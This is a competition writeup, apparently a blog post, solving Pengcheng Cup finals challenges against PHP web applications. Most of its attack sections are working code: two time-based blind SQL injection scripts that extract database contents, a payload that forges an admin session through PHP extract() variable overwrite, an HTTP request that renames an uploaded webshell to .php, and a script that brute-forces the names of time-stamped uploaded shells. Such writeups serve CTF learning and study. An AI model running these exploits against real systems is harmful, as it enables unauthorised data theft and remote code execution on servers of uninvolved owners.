Pengcheng Cup Finals: selected challenges

Pengcheng Cup Finals writeup

I barely touched the internal network part; I only tried it at the very end, and after getting a shell with msf the proxy forwarding still didn't work. Internal network penetration is a blank page for me; I hope to learn much more of it this year.
[toc]

Typical enterprise network

Two flags can be read by visiting these URLs directly:
http://60.208.18.2/robots.txt

http://60.208.18.2:81/flag.txt

Camera interference

In Wireshark, filter on `tcp.stream eq 30`. The stream contains the base64 string below, which decodes to the 32-character hex string 320f05cdf0248ff0d086a8f1a0249958:

MzIwZjA1Y2RmMDI0OGZmMGQwODZhOGYxYTAyNDk5NTg=

Classic university network

There is a git leak at /.git, and /Admin.php is the back-end login. A test account testtest with password schoolcms exists; logging in with it yields one flag.

Time-based blind injection gives the flag stored in the database:

```python
import requests
import time

url0 = 'http://60.209.18.2/index.php'
# session cookie of the logged-in test user: the injection point is in the back end
cookies = {'PHPSESSID': 'ufj7v0cf19tb37bvu0iapjcp60'}


def test(cond):
    # SchoolCMS takes id as an array, so id[where] ends up unescaped in the WHERE clause;
    # a true condition makes MySQL sleep 2 s, which is what we measure
    url = url0 + f"?m=Admin&c=Article&a=SaveInfo&id[where]=id=3 and if({cond},sleep(2),0)--+1"
    tb = time.time()
    requests.get(url, cookies=cookies)
    ta = time.time()
    # print(ta-tb)
    return ta - tb >= 2


def inject():
    # the queries were run one after another; the result of each is noted below it
    # select = 'database()'
    # -> schoolcms
    # select = "select group_concat(table_name) from information_schema.tables where table_schema='schoolcms'"
    # -> flag
    # select = "select group_concat(column_name) from information_schema.columns where table_name='flag'"
    # -> flag
    select = "select flag from flag"
    # -> PCL{d3be4ccd-bf19-41fe-bfe4-8d8db7fd0a1e}
    result = ''
    for pos in range(1, 100):
        # linear scan over the printable ASCII range for character `pos`
        guess = 32
        while True:
            cond = f'ascii(substr(({select}),{pos},1))={guess}'
            if test(cond):
                break
            guess += 1
            if guess == 127:
                return  # nothing matched: end of string
        result += chr(guess)
        print(result)


if __name__ == '__main__':
    inject()
    # test(1)
```

The site-logo upload accepts a PHP webshell. The upload path is known from the source code, and the file is named after the upload time, so the name can be brute-forced. There is a flag in the web root.
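The brute force of a time-named upload, as an added example (not code from the original writeup). It assumes the handler names the file `date('YmdHis')` plus the extension; the real format is whatever the leaked source shows and goes into `fmt`. The upload directory URL (`base_url`) and the names used for the demo are placeholders. The useful part is the clock check: the `Date` header of the upload response tells you the server's time, so the search window can be centred on the server's clock rather than on yours. If PHP's `date.timezone` is not UTC, shift `server_time` by that offset as well.

```python
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime
from typing import Callable, Iterable, Optional
from urllib import error, request

# Assumed naming scheme: date('YmdHis') followed by the extension.
DEFAULT_FMT = '%Y%m%d%H%M%S'


def server_clock_offset(date_header: str, local_now: datetime) -> timedelta:
    """Server clock minus local clock, taken from the Date header of a response.

    Record local_now (timezone-aware, UTC) when the response arrives; applied
    to the moment of the upload this gives the server's idea of the upload time.
    """
    return parsedate_to_datetime(date_header) - local_now


def candidate_names(server_time: datetime, window: int,
                    fmt: str = DEFAULT_FMT, ext: str = '.php') -> list:
    """Filenames to try, nearest to the estimated upload second first
    (offsets 0, -1, +1, -2, +2, ... seconds)."""
    names = []
    for k in range(window + 1):
        for sign in ((0,) if k == 0 else (-1, 1)):
            stamp = server_time + timedelta(seconds=sign * k)
            names.append(stamp.strftime(fmt) + ext)
    return names


def first_hit(names: Iterable[str], exists: Callable[[str], bool]) -> Optional[str]:
    """Return the first candidate the `exists` check accepts, else None."""
    for name in names:
        if exists(name):
            return name
    return None


def http_exists(base_url: str) -> Callable[[str], bool]:
    """HEAD each candidate under base_url (assumed URL of the upload directory).

    Probe a name that cannot exist first: a site that answers 200 for missing
    files (custom error page) would make every candidate look like a hit.
    """
    def exists(name: str) -> bool:
        req = request.Request(base_url.rstrip('/') + '/' + name, method='HEAD')
        try:
            with request.urlopen(req) as resp:
                return resp.status == 200
        except error.HTTPError:
            return False
    return exists


if __name__ == '__main__':
    # Constructed demo: the upload response said 12:00:10 GMT while our clock
    # read 12:00:00, so the server runs 10 s ahead of us.
    local_now = datetime(2022, 7, 17, 12, 0, 0, tzinfo=timezone.utc)
    offset = server_clock_offset('Sun, 17 Jul 2022 12:00:10 GMT', local_now)
    names = candidate_names(local_now + offset, window=3)
    # stand-in for http_exists(base_url): pretend one particular name exists
    print(first_hit(names, lambda n: n == '20220717120009.php'))
```

Against a live target replace the lambda with `http_exists('http://host/uploads/')` (path assumed) and widen `window` until the shell answers; because the candidates are ordered by distance from the estimated second, the hit usually comes within a handful of requests.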

Cloud-native scenario

action.php has a SQL injection in the login form. The script is below; once it works, query `select flag from flag`.


```python
import requests
import time

url = "http://10.10.1.11:8080/action.php?mode=login"
headers = {
    "Cookie": "PHPSESSID=9kgvt180gn1t3ji3i8pd7kt4ev",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded",
}


def test(cond):
    # user is inside single quotes in the query; XOR keeps the expression valid
    # whatever follows the closing quote, and a true condition sleeps 0.5 s
    payload = f"pass=p&user=0'XOR(if({cond},sleep(0.5),0))XOR'Z"
    tb = time.time()
    res = requests.post(url, headers=headers, data=payload)
    # print(res.request.headers)
    # print(res.text)
    ta = time.time()
    return ta - tb  # round-trip time; above 0.5 s means the condition held


# Queries run in turn during enumeration, with what they returned:
# select = 'select group_concat(table_name) from information_schema.tables where table_schema=database()'
#   -> bgszichan,config,danwei,flag,juese,log,system_menu,user,wgbzichan,xinxizichan,zclx,zhuangtai
#   (databases: information_schema,mysql,performance_schema,sys,zcglxt_ccn)
# select = 'select group_concat(column_name) from information_schema.columns where table_name=\'xinxizichan\''
# select = 'select group_concat(password) from zcglxt_ccn.user'
# select = 'select group_concat(username) from zcglxt_ccn.config'
#   -> admin,test
# select = 'select group_concat("id:",id,"user:",user,"action:",action,"ip:",ip)'
#   -> log columns: id,user,action,ip,time
# general_log_file: /var/lib/mysql/11279c090274.log   general_log: not set
# config: id,title,value,sm
# juese:
# bgsizichaun: id,zcbh,xlh,zclx,zczt,bm,bgr,dz,cgsj,rzsj,zbsc,sysc,pp,xh,zcly,zcjz,gg,bz,img,ll,
# danwei: id,name,status
# zhuangtai: id,name,status
# system_menu: id,pid,title,icon,href,target,sort,status,remark,create_at,update_at,delete_at
select = 'select ll from xinxizichan where id =2'


def inject():
    name = ''
    for i in range(1, 100000):
        # binary search over the printable ASCII range [32,128) for character i
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            cond = f'ascii(substr(({select}),{i},1))>{mid}'
            if test(cond) > 0.5:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            # ascii('') is 0 past the end of the string, so the search bottoms
            # out at 32 (a literal space would stop it the same way)
            break
        name = name + chr(mid)
        print(name)


if __name__ == '__main__':
    inject()
    # test(1)
```

changepassword calls extract() on the request, which allows variable overwrite: PHP parses `_SESSION[admin]=admin` into the nested array `$_POST['_SESSION']`, so extract($_POST) replaces the session array with attacker-chosen keys and logs you in as admin. POST body:

```
&_SESSION[admin]=admin&_SESSION[juese]=1&_SESSION[user]=admin
```

In the asset module an image webshell can be uploaded, and a later rename() call changes its name to a .php extension. Before execution reaches that if branch, however, a `data` parameter has to be supplied so that the database UPDATE succeeds once (the relevant source was shown in a screenshot). The expected format of `data` can be obtained by querying an existing record. Set the `img` value to the uploaded file and send the following request to rename the image webshell to a PHP file:

```http
POST /action.php?mode=xiugaixxzxzc HTTP/1.1
Host: 10.10.1.11:8080
Content-Length: 607
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.10.1.11:8080
Referer: http://10.10.1.11:8080/page/editxxzichan.php?id=9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ko;q=0.8
Cookie: PHPSESSID=de4b6l8qh31fodhe6jig3qb0sm
Connection: close

id=9&zz=1&data=%7b%22zclx%22%3a%221%22%2c%22zczt%22%3a%221%22%2c%22zcbh%22%3a%22%22%2c%22xlh%22%3a%22ddddssss%22%2c%22bgr%22%3a%22aaa%22%2c%22bm%22%3a%221%22%2c%22dz%22%3a%22dddd%22%2c%22cgsj%22%3a%222022-07-17%22%2c%22rzsj%22%3a%222022-07-17%22%2c%22zbsc%22%3a%220%22%2c%22sysc%22%3a%220%22%2c%22pp%22%3a%22123123%22%2c%22xh%22%3a%22%22%2c%22gg%22%3a%22%22%2c%22zcly%22%3a%22自购%22%2c%22zcjz%22%3a%220.00%22%2c%22bz%22%3a%22%22%2c%22file%22%3a%22%22%2c%22img%22%3a%22%2fuploads%2f1.php%22%2c%22wlbs%22%3a%220%22%2c%22ip%22%3a%22%22%2c%22xsq%22%3a%22%22%2c%22yp%22%3a%220%22%2c%22nc%22%3a%220%22%7d
```

After getting a shell, two flags were found in the file /start.sh.


Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 4.0; please credit the source when reposting.